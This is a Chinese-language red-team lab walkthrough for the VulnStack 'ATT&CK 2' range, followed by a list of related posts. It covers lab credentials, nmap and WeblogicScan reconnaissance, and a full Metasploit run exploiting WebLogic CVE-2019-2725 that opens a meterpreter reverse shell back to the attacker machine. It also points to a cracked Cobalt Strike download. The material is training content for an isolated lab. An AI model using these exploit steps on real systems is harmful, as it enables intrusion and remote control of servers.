ATTCK实战系列——红队实战(二)
目录
环境配置
环境说明
信息收集
Nmap进行端口探测
获得信息
漏洞检测
检测weblogic是否存在漏洞
漏洞利用
CS上线
连接到团队服务器
Windows连接
添加监听器
MSF派生shell
内网信息收集
内网渗透的简单思路
内网主机探活+端口扫描
Run Mimikatz
添加smb监听器
提权
横向提权
权限维持
环境配置
首先在VMware->编辑->虚拟网络编辑器里 更改子网ip为192.168.111.0
环境说明
- DC
IP:10.10.10.10
OS:Windows 2012
- WEB(初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去)
IP1:10.10.10.80
IP2:192.168.111.80
OS:Windows 2008
- PC
IP1:10.10.10.201
IP2:192.168.111.201
OS:Windows 7
- 攻击机
IP:192.168.111.128
OS:Kali
内网网段:10.10.10.0/24
DMZ网段:192.168.111.0/24
管理员账号密码:Administrator/1qaz@WSX
先从WEB机开始,注意需要手动开启服务,在 C:\Oracle\Middleware\user_projects\domains\base_domain\bin 下有一个 startWeblogic 的批处理,管理员身份运行它即可。
信息收集
Nmap进行端口探测
由于防火墙的存在不能使用icmp包,所以使用syn包探测
nmap -sS -sV 192.168.111.80
-sS 使用SYN半开式扫描
-sV 探测服务版本信息
SYN扫描:nmap向服务器发送一个syn数据报文,如果侦测到端口开放并返回SYN-ACK响应报文,nmap立即中断此次连接
此外也可通过常用nmap用法进行端口探测
nmap -A -T4 -v -Pn 192.168.111.80
-A 进行全面扫描(操作系统检测、版本检测、脚本检测和跟踪路由)
-T4 设置时序,级别越高速度越快
-v 显示更加详细的信息
-Pn 无ping扫描
获得信息
中间件:IIS7.5
操作系统:Windows Server 2008 R2
数据库:SQL server (开启了1433端口,SQL server默认端口为1433)
80端口:常见web网站
139端口:对应Samba服务
445端口:对应SMB服务
3389端口:对应开启远程桌面
7001端口:对应存在WebLogic(WebLogic是一种免费的web容器)
漏洞检测
访问80端口
nothing at all,什么都没有
访问7001端口
看来存在业务
检测weblogic是否存在漏洞
这里利用github上一个weblogic漏洞检测工具——WeblogicScan
python3 WeblogicScan.py -u 192.168.111.80 -p 7001
存在cve-2017-10271、cve-2017-3506、cve-2019-2725、cve-2019-2729历史漏洞
漏洞利用
这里使用CVE-2019-2725(Weblogic反序列化漏洞)
CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。
打开msf,search cve-2019-2725
set rhosts 192.168.111.80
set lhosts 192.168.111.128
set target Windows
set payload windows/meterpreter/reverse_tcp
msf6 > use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
[*] Using configured payload cmd/unix/reverse_bashmsf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set rhosts 192.168.111.80
rhosts => 192.168.111.80
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lhost 192.168.111.128
lhost => 192.168.111.128
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set target Windows
target => Windows
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > show options Module options (exploit/multi/misc/weblogic_deserialize_asyncresponseservice):Name Current Setting Required Description---- --------------- -------- -----------Proxies no A proxy chain of format type:host:port[,type:host:port][...]RHOSTS 192.168.111.80 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT 7001 yes The target port (TCP)SSL false no Negotiate SSL/TLS for outgoing connectionsTARGETURI /_async/AsyncResponseService yes URL to AsyncResponseServiceVHOST no HTTP server virtual hostPayload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)LHOST 192.168.111.128 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----1 Windowsmsf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > run[*] Started reverse TCP handler on 192.168.111.128:4444
[*] Generating payload...
[*] Sending payload...
[*] Sending stage (175174 bytes) to 192.168.111.80
[*] Meterpreter session 1 opened (192.168.111.128:4444 -> 192.168.111.80:65427 ) at 2022-02-25 07:33:38 -0500meterpreter >
漏洞利用成功!
CS上线
CS下载地址:cobalt strike4.4破解版下载|cs4.4|cobalt strike4.4 cracked -
ATTCK实战系列——红队实战(二)相关推荐
- [VulnStack] ATTCK实战系列—红队实战(二)
文章目录 0x00 环境搭建 0x01 信息收集 端口探测 目录扫描 0x02 漏洞利用 0x03 内网收集 主机信息搜集 域信息收集 内网漏洞扫描 0x04 横向渗透 MS17-010 PsExec ...
- ATTCK实战系列——红队实战(五)
ATT&CK实战系列--红队实战(五) 文章目录 ATT&CK实战系列--红队实战(五) 前言 靶场搭建 网络配置 外网渗透 内网渗透 内网信息收集 msf反弹shell 设置路由 探 ...
- ATTCK实战系列——红队实战(—)
ATT&CK实战系列--红队实战(-) 文章目录 ATT&CK实战系列--红队实战(-) 前言 一.环境搭建 1.1 靶场下载 1.2 网卡配置 二.外网渗透 三.内网渗透 1. 尝试 ...
- ATTCK实战系列——红队实战(一)
文章目录 环境搭建 渗透测试部分 phpmyadmin 日志 getshell yxcms 前端 XSS 任意文件写入 getshell 任意文件删除 后渗透阶段 域控信息收集 域外信息收集与渗透 3 ...
- ATTCK实战系列—红队实战-4
0.靶场介绍 靶场下载.配置参考:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 靶场配置后需要自行开启 vulhub 里面的三个漏洞. 1.信息收 ...
- ATTCK实战系列 —— 红队实战(三)
环境准备 网络拓扑图 外网网段:172.26.239.0/24 内网网段:192.168.93.0/24 主机 外网 内网 Centos 172.26.239.89 192.168.93.100 Ub ...
- 记ATTCK实战系列——红队实战(三)红日靶场
以下操作均在测试环境进行,遵章守法 靶场镜像地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 20G左右,分为5个虚拟机,下载之后分别解压,导进 ...
- ATTCK实战系列-红队评估(三)WP
环境搭建 靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 将虚拟机下载下来后按照官方说明配置好网络环境即可开始测试 渗透流程 0x01 ...
- linux 系统命令被后门修改_红队实战攻防技术分享:Linux后门总结SSH利用篇
导读:常见红队评估中,也能遇到很多Linux服务器,如何使Linux在安全人员/运维人员的检查过程中能够稳定的持续的用做跳板,本系列文章将对常见的Linux后门技术作以总结归纳,将相关技术展现给大家. ...
- 【安全实战】红队攻防技术
前言 希望能够面向红蓝双方进行讲解,在进行一些攻击方式分析时,同样也会引起防守方对于攻击的思考.红蓝对抗的意义也正是在这种持续的攻击下不断寻找防御的平衡点,故 未知攻,焉知防. 本文仅做安全研究作 ...
最新文章
- SBB:长期施肥影响土壤固氮菌的群落装配过程
- 国外java开源网站聚合
- 五种最易被老板开除的人
- 外部表如何导入mysql_如何利用Oracle外部表导入文本文件的数据
- matlab函数算错,函数是这个样子的,我是不懂应该怎么输入,试了好多种情况都是错...
- 数据结构实习-迷宫(基于Qt实现)
- 为什么不用 LinkedList
- Linux私房菜阅读笔记
- js 斐波那契数列(兔子问题)
- Flex与Servlet之间数据的交互
- PIC单片机c语言休眠,PIC16F72 休眠程序
- 用于高速网络的实时且可靠的基于异常的入侵检测
- 2022数学建模国赛ABC题思路
- 雷电三接口有什么用_三坐标中的矢量是干什么用的?
- Telegram普通账号定时发布信息、签到
- Visual C++2010学习版详细安装教程
- 厦门大学“网宿杯“17届程序设计竞赛决赛(同步赛) #题解 #题目都超有趣呀
- 百度音乐api+c语言,百度音乐API全接口
- dnsmasq反DNS劫持、DNS污染、去广告
- Mac新手必看教程 Mac系统基本设置 苹果电脑的基本操作
热门文章
- 如何查看网站被搜索引擎收录的情况
- 利用 MAC 自带的 mount_ntfs 工具加载ntfs移动硬盘进行数据读写
- MacQQ上接收的文件都放在哪?
- 一分钟带你解读收发器指示灯以及SFP光模块搭配(二)
- mysql rps和tps区别_并发虚拟用户、RPS、TPS的解读
- 服务器盘符修改不了怎么办,win10更换盘符报参数错误怎么办_win10系统盘符改不了参数错误解决方法...
- net configuration assistant 没反应_苗阜深夜发文:20年了没被打过,张玉浩,你已经离开青曲社了...
- python调用金山词霸的api
- No.476 数字的补数
- [USACO16DEC]Team Building团队建设